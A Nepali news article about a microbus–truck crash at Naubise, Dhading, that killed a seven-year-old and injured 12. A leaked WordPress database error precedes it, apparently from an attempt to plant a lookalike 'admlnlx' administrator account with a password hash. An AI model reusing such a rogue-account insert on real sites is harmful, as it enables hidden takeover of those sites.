WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B91wAMafiSOoDR51.vZ1P0LnOk6Xhe1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 23:27:30', '', 'admlnlx', 'admlnlx')
धादिङ, माघ २३–
पृथ्वी राजमार्गअन्तर्गत धादिङको नौबिसे–१ धार्केमा आज साँझ माइक्रोबस दुर्घटनामा परी गोरखा घर भएका सात वर्षीय सुजन थापाको मृत्यु भएको छ भने १२ यात्रु घाइते भएका छन् ।
काठमाडौँबाट गोरखा जाँदै गरेको बा२ख ३७१४ नंको माइक्रोबस र ना५ख २९२० नंको ट्रक एकआपसमा ठोक्किएर सो दुर्घटना भएको इलाका प्रहरी कार्यालयले जनाएको छ । थापाको उपचारका क्रममा मृत्यु भएको हो ।
दुर्घटनामा गम्भीर घाइते भएका तीन जनाको ललितपुरस्थित गणेशमान महालक्ष्मी अस्पताल तथा अन्यको धार्केस्थित शिवदर्शन अस्पतालमा उपचार भइरहेको छ ।